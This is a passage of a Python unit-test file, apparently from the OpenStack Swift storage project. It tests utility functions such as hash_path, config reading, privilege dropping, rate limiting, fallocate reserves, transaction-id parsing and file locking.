        log_msg = strip_value(sio)
        self.assert_('client_ip' in log_msg)
        self.assert_('1.2.3.4' in log_msg)
        # test no client_ip on info message
        self.assertEquals(logger.client_ip, '1.2.3.4')
        logger.info('test')
        log_msg = strip_value(sio)
        self.assert_('client_ip' not in log_msg)
        self.assert_('1.2.3.4' not in log_msg)
        # test client_ip (and txn) already in message
        self.assertEquals(logger.client_ip, '1.2.3.4')
        logger.warn('test 1.2.3.4 test 12345')
        self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
    finally:
        logger.logger.removeHandler(handler)
        reset_loggers()
def test_storage_directory(self):
    """storage_directory inserts the hash's last three chars as a subdir."""
    expected = 'objects/1/DEF/ABCDEF'
    self.assertEquals(
        utils.storage_directory('objects', '1', 'ABCDEF'), expected)
def test_whataremyips(self):
    """whataremyips returns several addresses, including loopback."""
    ips = utils.whataremyips()
    self.assert_(len(ips) > 1)
    self.assert_('127.0.0.1' in ips)
def test_whataremyips_error(self):
    """If netifaces.ifaddresses raises, whataremyips returns []."""
    def fake_interfaces():
        return ['eth0']
    def fake_ifaddresses(interface):
        raise ValueError
    with nested(
            patch('netifaces.interfaces', fake_interfaces),
            patch('netifaces.ifaddresses', fake_ifaddresses)):
        self.assertEquals(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
    """An IPv6 scope id suffix (%eth0) must be stripped from results."""
    address = '2001:6b0:dead:beef:2::32'
    scope = 'eth0'
    def fake_interfaces():
        return ['eth0']
    def fake_ifaddresses(interface):
        # advertise the address with its scope id appended
        return {AF_INET6: [{'netmask': 'ffff:ffff:ffff:ffff::',
                            'addr': '%s%%%s' % (address, scope)}]}
    with nested(
            patch('netifaces.interfaces', fake_interfaces),
            patch('netifaces.ifaddresses', fake_ifaddresses)):
        ips = utils.whataremyips()
        self.assertEquals(len(ips), 1)
        self.assertEquals(ips[0], address)
def test_hash_path(self):
    """Pin hash_path output exactly so any change to the hashing scheme
    or prefix/suffix handling breaks loudly."""
    _prefix = utils.HASH_PATH_PREFIX
    utils.HASH_PATH_PREFIX = ''
    # Yes, these tests are deliberately very fragile. We want to make sure
    # that if someones changes the results hash_path produces, they know it
    try:
        self.assertEquals(utils.hash_path('a'),
                          '1c84525acb02107ea475dcd3d09c2c58')
        self.assertEquals(utils.hash_path('a', 'c'),
                          '33379ecb053aa5c9e356c68997cbb59e')
        self.assertEquals(utils.hash_path('a', 'c', 'o'),
                          '06fbf0b514e5199dfc4e00f42eb5ea83')
        self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
                          '06fbf0b514e5199dfc4e00f42eb5ea83')
        # raw_digest=True returns the digest bytes rather than hex
        self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=True),
                          '\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
                          '\x00\xf4.\xb5\xea\x83')
        # an object without a container is rejected
        self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
        # a different prefix must produce a different hash
        utils.HASH_PATH_PREFIX = 'abcdef'
        self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
                          '363f9b535bfb7d17a43a46a358afca0e')
    finally:
        utils.HASH_PATH_PREFIX = _prefix
def test_load_libc_function(self):
    """load_libc_function returns a callable even for unknown symbols."""
    for symbol in ('printf', 'some_not_real_function'):
        self.assert_(callable(utils.load_libc_function(symbol)))
def test_readconf(self):
    """readconf accepts filenames or file-like objects and supports
    section selection, log_name overrides and extra defaults."""
    conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
    # setup a real file
    fd, temppath = tempfile.mkstemp(dir='/tmp')
    with os.fdopen(fd, 'wb') as f:
        f.write(conf)
    make_filename = lambda: temppath
    # setup a file stream
    make_fp = lambda: StringIO(conf)
    # the same expectations must hold for a path and for a stream
    for conf_object_maker in (make_filename, make_fp):
        conffile = conf_object_maker()
        result = utils.readconf(conffile)
        expected = {'__file__': conffile,
                    'log_name': None,
                    'section1': {'foo': 'bar'},
                    'section2': {'log_name': 'yarr'}}
        self.assertEquals(result, expected)
        conffile = conf_object_maker()
        result = utils.readconf(conffile, 'section1')
        expected = {'__file__': conffile, 'log_name': 'section1',
                    'foo': 'bar'}
        self.assertEquals(result, expected)
        conffile = conf_object_maker()
        result = utils.readconf(conffile,
                                'section2').get('log_name')
        expected = 'yarr'
        self.assertEquals(result, expected)
        conffile = conf_object_maker()
        result = utils.readconf(conffile, 'section1',
                                log_name='foo').get('log_name')
        expected = 'foo'
        self.assertEquals(result, expected)
        conffile = conf_object_maker()
        result = utils.readconf(conffile, 'section1',
                                defaults={'bar': 'baz'})
        expected = {'__file__': conffile, 'log_name': 'section1',
                    'foo': 'bar', 'bar': 'baz'}
        self.assertEquals(result, expected)
    # a missing section or a missing file exits rather than raising
    self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
    os.unlink(temppath)
    self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
    """raw=True must leave %(...)s interpolation patterns untouched."""
    conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
    # setup a real file
    fd, temppath = tempfile.mkstemp(dir='/tmp')
    with os.fdopen(fd, 'wb') as f:
        f.write(conf)
    make_filename = lambda: temppath
    # setup a file stream
    make_fp = lambda: StringIO(conf)
    for conf_object_maker in (make_filename, make_fp):
        conffile = conf_object_maker()
        result = utils.readconf(conffile, raw=True)
        expected = {'__file__': conffile,
                    'log_name': None,
                    'section1': {'foo': 'bar'},
                    'section2': {'log_name': '%(yarr)s'}}
        self.assertEquals(result, expected)
    os.unlink(temppath)
    # a missing file still exits rather than raising
    self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
    """Reading a .conf.d directory merges every file it contains; the
    expected values show the later file's DEFAULT port (8081) winning."""
    config_dir = {
        'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
        'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
        # this sibling directory must NOT be read
        'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
    }
    # strip indent from test config contents
    config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
    with temptree(*zip(*config_dir.items())) as path:
        conf_dir = os.path.join(path, 'server.conf.d')
        conf = utils.readconf(conf_dir)
    expected = {
        '__file__': os.path.join(path, 'server.conf.d'),
        'log_name': None,
        'section1': {
            'port': '8081',
            'foo': 'bar',
            'bar': 'baz',
            'name': 'section1',
        },
        'section2': {
            'port': '8081',
            'foo': 'bar',
            'bar': 'baz',
            'name': 'section2',
        },
    }
    self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
    """Only plain *.conf files in a conf dir are read; dot-files and
    other extensions (editor swap/backup files) are skipped."""
    config_dir = {
        'server.conf.d/01.conf': """
[section1]
port = 8080
""",
        # hidden swap file: must be ignored
        'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
        # non-.conf extension: must be ignored
        'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
    }
    # strip indent from test config contents
    config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
    with temptree(*zip(*config_dir.items())) as path:
        conf_dir = os.path.join(path, 'server.conf.d')
        conf = utils.readconf(conf_dir)
    expected = {
        '__file__': os.path.join(path, 'server.conf.d'),
        'log_name': None,
        'section1': {
            'port': '8080',
        },
    }
    self.assertEquals(conf, expected)
def test_drop_privileges(self):
    """drop_privileges must invoke the full set of os privilege calls
    and set $HOME; an OSError from setsid must be tolerated."""
    user = getuser()
    # over-ride os with mock
    required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
                           'chdir', 'umask')
    utils.os = MockOs(called_funcs=required_func_calls)
    # exercise the code
    utils.drop_privileges(user)
    for func in required_func_calls:
        self.assert_(utils.os.called_funcs[func])
    import pwd
    # HOME must be pointed at the user's passwd-entry home dir
    self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
    # reset; test same args, OSError trying to get session leader
    utils.os = MockOs(called_funcs=required_func_calls,
                      raise_funcs=('setsid',))
    for func in required_func_calls:
        self.assertFalse(utils.os.called_funcs.get(func, False))
    utils.drop_privileges(user)
    # every call still happens despite setsid raising
    for func in required_func_calls:
        self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
    """capture_stdio installs an excepthook, closes the stdio fds, and
    swaps stdout/stderr for LoggerFileObjects unless capture is off."""
    # stubs
    logger = utils.get_logger(None, 'dummy')
    # mock utils system modules
    _orig_sys = utils.sys
    _orig_os = utils.os
    try:
        utils.sys = MockSys()
        utils.os = MockOs()
        # basic test
        utils.capture_stdio(logger)
        self.assert_(utils.sys.excepthook is not None)
        self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
        self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
        self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
        # reset; test same args, but exc when trying to close stdio
        utils.os = MockOs(raise_funcs=('dup2',))
        utils.sys = MockSys()
        # test unable to close stdio
        utils.capture_stdio(logger)
        self.assert_(utils.sys.excepthook is not None)
        # no fds were closed because dup2 raised
        self.assertEquals(utils.os.closed_fds, [])
        self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
        self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
        # reset; test some other args
        utils.os = MockOs()
        utils.sys = MockSys()
        logger = utils.get_logger(None, log_to_console=True)
        # test console log
        utils.capture_stdio(logger, capture_stdout=False,
                            capture_stderr=False)
        self.assert_(utils.sys.excepthook is not None)
        # when logging to console, stderr remains open
        self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
        reset_loggers()
        # stdio not captured
        self.assertFalse(isinstance(utils.sys.stdout,
                                    utils.LoggerFileObject))
        self.assertFalse(isinstance(utils.sys.stderr,
                                    utils.LoggerFileObject))
        reset_loggers()
    finally:
        utils.sys = _orig_sys
        utils.os = _orig_os
def test_get_logger_console(self):
    """log_to_console attaches exactly one console StreamHandler; a
    repeat call replaces it rather than duplicating it."""
    def console_handlers(logger):
        # collect the StreamHandlers currently attached to the logger
        return [h for h in logger.logger.handlers
                if isinstance(h, logging.StreamHandler)]
    reset_loggers()
    logger = utils.get_logger(None)
    self.assertFalse(console_handlers(logger))
    logger = utils.get_logger(None, log_to_console=True)
    handlers = console_handlers(logger)
    self.assert_(handlers)
    # make sure you can't have two console handlers
    self.assertEquals(len(handlers), 1)
    old_handler = handlers[0]
    logger = utils.get_logger(None, log_to_console=True)
    handlers = console_handlers(logger)
    self.assertEquals(len(handlers), 1)
    self.assertNotEquals(handlers[0], old_handler)
    reset_loggers()
def test_ratelimit_sleep(self):
    """A max_rate of 0 never sleeps; a positive rate paces calls."""
    running_time = 0
    start = time.time()
    for _ in range(100):
        running_time = utils.ratelimit_sleep(running_time, 0)
    # 100 unthrottled calls should take (well) under 10ms
    self.assertTrue(abs((time.time() - start) * 100) < 1)
    running_time = 0
    start = time.time()
    for _ in range(50):
        running_time = utils.ratelimit_sleep(running_time, 200)
    # 50 calls at 200/sec should take ~0.25s (accurate to a 10th of a
    # second)
    self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
def test_ratelimit_sleep_with_incr(self):
    """incr_by weights each call: 250 units at 500/sec is ~0.5s.

    The dead ``total`` accumulator from the original was removed; it
    was never asserted against.
    """
    running_time = 0
    start = time.time()
    vals = [5, 17, 0, 3, 11, 30,
            40, 4, 13, 2, -1] * 2  # adds up to 250 (with no -1)
    for i in vals:
        running_time = utils.ratelimit_sleep(running_time,
                                             500, incr_by=i)
    # accurate to a 10th of a second
    self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
    """utils.urlparse handles http(s), ports, and bracketed IPv6 hosts."""
    parsed = utils.urlparse('http://127.0.0.1/')
    self.assertEquals(parsed.scheme, 'http')
    self.assertEquals(parsed.hostname, '127.0.0.1')
    self.assertEquals(parsed.path, '/')
    self.assertEquals(utils.urlparse('http://127.0.0.1:8080/').port, 8080)
    self.assertEquals(utils.urlparse('https://127.0.0.1/').scheme, 'https')
    # IPv6 literals lose their brackets in hostname
    self.assertEquals(utils.urlparse('http://[::1]/').hostname, '::1')
    parsed = utils.urlparse('http://[::1]:8080/')
    self.assertEquals(parsed.hostname, '::1')
    self.assertEquals(parsed.port, 8080)
    # without a scheme there is no recognised hostname
    self.assertEquals(utils.urlparse('www.example.com').hostname, '')
def test_ratelimit_sleep_with_sleep(self):
    """Time spent between calls counts against the rate budget (with a
    rate_buffer), so explicit naps don't add to the total wall time."""
    running_time = 0
    start = time.time()
    # three explicit 0.2s naps amid otherwise unthrottled calls
    sleeps = [0] * 7 + [.2] * 3 + [0] * 30
    for i in sleeps:
        running_time = utils.ratelimit_sleep(running_time, 40,
                                             rate_buffer=1)
        time.sleep(i)
    # make sure it's accurate to 10th of a second
    self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
    """search_tree matches files by glob and extension, recursing into
    matching directories."""
    # file match & ext miss
    with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
        asdf = utils.search_tree(t, 'a*', '.conf')
        self.assertEquals(len(asdf), 1)
        self.assertEquals(asdf[0],
                          os.path.join(t, 'asdf.conf'))
    # multi-file match & glob miss & sort
    with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
        app_bins = utils.search_tree(t, 'app*', 'bin')
        self.assertEquals(len(app_bins), 2)
        self.assertEquals(app_bins[0],
                          os.path.join(t, 'apple.bin'))
        self.assertEquals(app_bins[1],
                          os.path.join(t, 'application.bin'))
    # test file in folder & ext miss & glob miss
    files = (
        'sub/file1.ini',
        'sub/file2.conf',
        'sub.bin',
        'bus.ini',
        'bus/file3.ini',
    )
    with temptree(files) as t:
        sub_ini = utils.search_tree(t, 'sub*', '.ini')
        self.assertEquals(len(sub_ini), 1)
        self.assertEquals(sub_ini[0],
                          os.path.join(t, 'sub/file1.ini'))
    # test multi-file in folder & sub-folder & ext miss & glob miss
    files = (
        'folder_file.txt',
        'folder/1.txt',
        'folder/sub/2.txt',
        'folder2/3.txt',
        # BUGFIX: a missing trailing comma here used to silently
        # concatenate this entry with 'folder.rc'; the expected count of
        # 4 is unchanged ('Folder3' misses the glob, '.rc' the ext)
        'Folder3/4.txt',
        'folder.rc',
    )
    with temptree(files) as t:
        folder_texts = utils.search_tree(t, 'folder*', '.txt')
        self.assertEquals(len(folder_texts), 4)
        f1 = os.path.join(t, 'folder_file.txt')
        f2 = os.path.join(t, 'folder/1.txt')
        f3 = os.path.join(t, 'folder/sub/2.txt')
        f4 = os.path.join(t, 'folder2/3.txt')
        for f in [f1, f2, f3, f4]:
            self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
    """dir_ext lets search_tree return whole *.conf.d directories."""
    files = (
        'object-server/object-server.conf-base',
        'object-server/1.conf.d/base.conf',
        'object-server/1.conf.d/1.conf',
        'object-server/2.conf.d/base.conf',
        'object-server/2.conf.d/2.conf',
        'object-server/3.conf.d/base.conf',
        'object-server/3.conf.d/3.conf',
        'object-server/4.conf.d/base.conf',
        'object-server/4.conf.d/4.conf',
    )
    with temptree(files) as t:
        conf_dirs = utils.search_tree(t, 'object-server', '.conf',
                                      dir_ext='conf.d')
        self.assertEquals(len(conf_dirs), 4)
        for num in (1, 2, 3, 4):
            expected = os.path.join(t, 'object-server/%d.conf.d' % num)
            self.assert_(expected in conf_dirs)
def test_write_file(self):
    """write_file creates parent dirs but won't write through a file."""
    with temptree([]) as t:
        path = os.path.join(t, 'test')
        utils.write_file(path, 'test')
        with open(path, 'r') as f:
            self.assertEquals(f.read(), 'test')
        # missing subdirectories are created on demand
        path = os.path.join(t, 'subdir/test2')
        utils.write_file(path, 'test2')
        with open(path, 'r') as f:
            self.assertEquals(f.read(), 'test2')
        # but a path component that is an existing file raises IOError
        path = os.path.join(t, 'subdir/test2/test3')
        self.assertRaises(IOError, utils.write_file, path,
                          'test3')
def test_remove_file(self):
    """remove_file ignores missing paths and deletes existing files."""
    with temptree([]) as t:
        path = os.path.join(t, 'blah.pid')
        # removing a non-existent file must not raise
        self.assertEquals(os.path.exists(path), False)
        self.assertEquals(utils.remove_file(path), None)
        with open(path, 'w') as f:
            f.write('1')
        self.assert_(os.path.exists(path))
        self.assertEquals(utils.remove_file(path), None)
        self.assertFalse(os.path.exists(path))
def test_human_readable(self):
    """human_readable rounds to binary-prefixed (Ki/Mi/...) strings."""
    cases = [
        (0, '0'), (1, '1'), (10, '10'), (100, '100'), (999, '999'),
        (1024, '1Ki'), (1535, '1Ki'), (1536, '2Ki'),
        (1047552, '1023Ki'), (1048063, '1023Ki'),
        (1048064, '1Mi'), (1048576, '1Mi'),
        (1073741824, '1Gi'),
        (1099511627776, '1Ti'),
        (1125899906842624, '1Pi'),
        (1152921504606846976, '1Ei'),
        (1180591620717411303424, '1Zi'),
        (1208925819614629174706176, '1Yi'),
        # Yi is the largest suffix, so the number just keeps growing
        (1237940039285380274899124224, '1024Yi'),
    ]
    for value, expected in cases:
        self.assertEquals(utils.human_readable(value), expected)
def test_validate_sync_to(self):
    """validate_sync_to() accepts allowed hosts and rejects bad URLs."""
    allowed = ['1.1.1.1', '2.2.2.2']
    good_urls = ('http://1.1.1.1/v1/a/c/o',
                 'http://1.1.1.1:8080/a/c/o',
                 'http://2.2.2.2/a/c/o',
                 'https://1.1.1.1/v1/a/c/o',
                 '')
    for url in good_urls:
        # None means "no validation error".
        self.assertEqual(None, utils.validate_sync_to(url, allowed))
    bad_urls = ('http://1.1.1.1',
                'httpq://1.1.1.1/v1/a/c/o',
                'http://1.1.1.1/v1/a/c/o?query',
                'http://1.1.1.1/v1/a/c/o#frag',
                'http://1.1.1.1/v1/a/c/o?query#frag',
                'http://1.1.1.1/v1/a/c/o?query=param',
                'http://1.1.1.1/v1/a/c/o?query=param#frag',
                'http://1.1.1.2/v1/a/c/o')
    for url in bad_urls:
        # Missing path, bad scheme, query/fragment, or unlisted host.
        self.assertNotEqual(None, utils.validate_sync_to(url, allowed))
def test_TRUE_VALUES(self):
    """Every entry in TRUE_VALUES must already be lowercase."""
    for value in utils.TRUE_VALUES:
        self.assertEqual(value.lower(), value)
def test_config_true_value(self):
    """config_true_value() is case-insensitive and passes bools through."""
    orig_trues = utils.TRUE_VALUES
    try:
        # Temporarily substitute a known TRUE_VALUES list.
        utils.TRUE_VALUES = 'hello world'.split()
        for val in ('hello', 'world', 'HELLO', 'WORLD'):
            self.assertTrue(utils.config_true_value(val) is True)
        self.assertTrue(utils.config_true_value(True) is True)
        self.assertTrue(utils.config_true_value('foo') is False)
        self.assertTrue(utils.config_true_value(False) is False)
    finally:
        # Always restore the module-level constant.
        utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
    """config_auto_int_value() handles ints, 'auto', None, and bad input."""
    expectations = {
        # (value, default): expected result, or the exception class
        ('1', 0): 1,
        (1, 0): 1,
        ('asdf', 0): ValueError,
        ('auto', 1): 1,
        ('AutO', 1): 1,
        ('Aut0', 1): ValueError,
        (None, 1): 1,
    }
    for (value, default), expected in expectations.items():
        try:
            result = utils.config_auto_int_value(value, default)
        except Exception as err:
            # Only the expected exception class is tolerated.
            if err.__class__ is not expected:
                raise
        else:
            self.assertEqual(expected, result)
def test_streq_const_time(self):
    """streq_const_time() compares exactly: case and length both matter."""
    cases = [('abc123', 'abc123', True),
             ('a', 'aaaaa', False),
             ('ABC123', 'abc123', False)]
    for left, right, expected in cases:
        self.assertEqual(expected, utils.streq_const_time(left, right))
def test_quorum_size(self):
    """quorum_size(n) is a strict majority of n replicas."""
    expected_sizes = {1: 1, 2: 2, 3: 2, 4: 3, 5: 3}
    got_sizes = dict((n, utils.quorum_size(n)) for n in expected_sizes)
    self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
    """IPv4 addresses pass through rsync_ip() unchanged."""
    self.assertEqual('127.0.0.1', utils.rsync_ip('127.0.0.1'))
def test_rsync_ip_ipv6_random_ip(self):
    """IPv6 addresses come back wrapped in square brackets."""
    addr = 'fe80:0000:0000:0000:0202:b3ff:fe1e:8329'
    self.assertEqual('[%s]' % addr, utils.rsync_ip(addr))
def test_rsync_ip_ipv6_ipv4_compatible(self):
    """IPv4-mapped IPv6 addresses are bracketed like any IPv6 address."""
    addr = '::ffff:192.0.2.128'
    self.assertEqual('[%s]' % addr, utils.rsync_ip(addr))
def test_fallocate_reserve(self):
    """FallocateWrapper must raise OSError when granting the request
    would drop free space to or below FALLOCATE_RESERVE.

    Free space is taken from fstatvfs() as f_frsize * f_bavail; the
    requested file size (the last fallocate argument) is subtracted
    before the comparison against the reserve.
    """
    class StatVFS(object):
        # Stand-in fstatvfs() result; scenarios below mutate the
        # class attributes between calls.
        f_frsize = 1024
        f_bavail = 1

    def fstatvfs(fd):
        return StatVFS()

    # Save module-level state so the finally block can restore it.
    orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
    orig_fstatvfs = utils.os.fstatvfs
    try:
        # noop=True skips the real syscall but keeps the reserve check.
        fallocate = utils.FallocateWrapper(noop=True)
        utils.os.fstatvfs = fstatvfs
        # Want 1023 reserved, have 1024 * 1 free, so succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1023 reserved, have 512 * 2 free, so succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1024 reserved, have 1024 * 1 free, so fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
        # Want 1024 reserved, have 512 * 2 free, so fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
        # Want 2048 reserved, have 1024 * 1 free, so fails
        utils.FALLOCATE_RESERVE = 2048
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
        # Want 2048 reserved, have 512 * 2 free, so fails
        utils.FALLOCATE_RESERVE = 2048
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
        # Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
        # fails
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(1))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
        # Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
        # succeeds
        utils.FALLOCATE_RESERVE = 1022
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
        # Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
        # succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1024 reserved, have 1024 * 1 free, and even though
        # file size is 0, since we're under the reserve, fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError as err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
    finally:
        # Restore the patched module globals no matter what.
        utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
        utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
    """fallocate() always forwards to _sys_fallocate with mode=1 and a
    non-negative length, clamping zero/negative requests to 0."""
    class RecordingFallocate(object):
        # Captures the most recent call, mimicking the ctypes entry point.
        def __init__(self):
            self.last_call = None

        def __call__(self, *args):
            self.last_call = list(args)
            # The length arrives as a ctypes integer; store its value.
            self.last_call[-1] = self.last_call[-1].value
            return 0

    orig_sys_fallocate = utils._sys_fallocate
    try:
        utils._sys_fallocate = RecordingFallocate()
        # (requested bytes, expected length passed through)
        expectations = [
            (0, 0),                  # zero bytes still calls through
            (-5678, 0),              # negative clamps to zero
            (1, 1),
            (10 * 1024 * 1024 * 1024, 10 * 1024 * 1024 * 1024),
        ]
        for req_bytes, expected_len in expectations:
            utils._sys_fallocate.last_call = None
            utils.fallocate(1234, req_bytes)
            self.assertEqual([1234, 1, 0, expected_len],
                             utils._sys_fallocate.last_call)
    finally:
        utils._sys_fallocate = orig_sys_fallocate
def test_generate_trans_id(self):
    """Transaction ids look like 'tx' + 21 chars + '-' + 10 hex digits
    of the current epoch time, plus any caller-supplied suffix."""
    fake_time = 1366428370.5163341
    # No suffix: 34 characters total, timestamp after the dash.
    with patch.object(utils.time, 'time', return_value=fake_time):
        trans_id = utils.generate_trans_id('')
    self.assertEqual(34, len(trans_id))
    self.assertEqual('tx', trans_id[:2])
    self.assertEqual('-', trans_id[23])
    self.assertEqual(int(fake_time), int(trans_id[24:], 16))
    # With a suffix appended after the hex timestamp.
    with patch.object(utils.time, 'time', return_value=fake_time):
        trans_id = utils.generate_trans_id('-suffix')
    self.assertEqual(41, len(trans_id))
    self.assertEqual('tx', trans_id[:2])
    self.assertEqual('-suffix', trans_id[34:])
    self.assertEqual('-', trans_id[23])
    self.assertEqual(int(fake_time), int(trans_id[24:34], 16))
def test_get_trans_id_time(self):
    """get_trans_id_time() decodes the hex timestamp or returns None."""
    # Old-style ids with no embedded timestamp yield None.
    self.assertEqual(
        None,
        utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e'))
    # New-style id: the 10 hex digits after the dash are epoch seconds.
    ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
    self.assertEqual(1366428678, ts)
    self.assertEqual('Sat Apr 20 03:31:18 2013 UTC',
                     time.asctime(time.gmtime(ts)) + ' UTC')
    # A trailing suffix does not disturb the timestamp parse.
    ts = utils.get_trans_id_time(
        'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
    self.assertEqual(1366428678, ts)
    self.assertEqual('Sat Apr 20 03:31:18 2013 UTC',
                     time.asctime(time.gmtime(ts)) + ' UTC')
    # Garbage and malformed ids all map to None.
    for bogus in ('', 'garbage', 'tx1df4ff4f55ea45f7b2ec2-almostright'):
        self.assertEqual(None, utils.get_trans_id_time(bogus))
def test_tpool_reraise(self):
    """tpool_reraise() returns the function's value and re-raises any
    exception (including BaseException) raised in the tpool thread."""
    with patch.object(utils.tpool, 'execute', lambda f: f()):
        # BUG FIX: this was assertTrue(result, 'test1'), which used
        # 'test1' as the failure *message* and never compared values.
        self.assertEqual(
            'test1', utils.tpool_reraise(MagicMock(return_value='test1')))
        self.assertRaises(
            Exception,
            utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
        self.assertRaises(
            BaseException,
            utils.tpool_reraise,
            MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
    """lock_file() yields an flock-ed handle: a second non-blocking
    flock fails while the lock is held, nesting past `timeout` raises
    LockTimeout, and unlink=True removes the file on context exit."""
    flags = os.O_CREAT | os.O_RDWR
    with NamedTemporaryFile(delete=False) as nt:
        nt.write("test string")
        nt.flush()
        nt.close()
        with utils.lock_file(nt.name, unlink=False) as f:
            self.assertEqual(f.read(), "test string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(IOError, fcntl.flock, fd,
                              fcntl.LOCK_EX | fcntl.LOCK_NB)
        # append=True: despite seek(0), the write lands at end-of-file
        # (verified by the read-back below).
        with utils.lock_file(nt.name, unlink=False, append=True) as f:
            self.assertEqual(f.read(), "test string")
            f.seek(0)
            f.write("\nanother string")
            f.flush()
            f.seek(0)
            self.assertEqual(f.read(), "test string\nanother string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(IOError, fcntl.flock, fd,
                              fcntl.LOCK_EX | fcntl.LOCK_NB)
        # A nested lock_file on the same path must give up after its
        # own timeout instead of deadlocking.
        with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
            try:
                with utils.lock_file(
                        nt.name, timeout=1, unlink=False) as f:
                    self.assertTrue(
                        False, "Expected LockTimeout exception")
            except LockTimeout:
                pass
        # unlink=True: the file is gone once the context exits.
        with utils.lock_file(nt.name, unlink=True) as f:
            self.assertEqual(f.read(), "test string\nanother string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(
                IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
        self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
    """A path that does not exist is never reported as a mount."""
    workdir = mkdtemp()
    try:
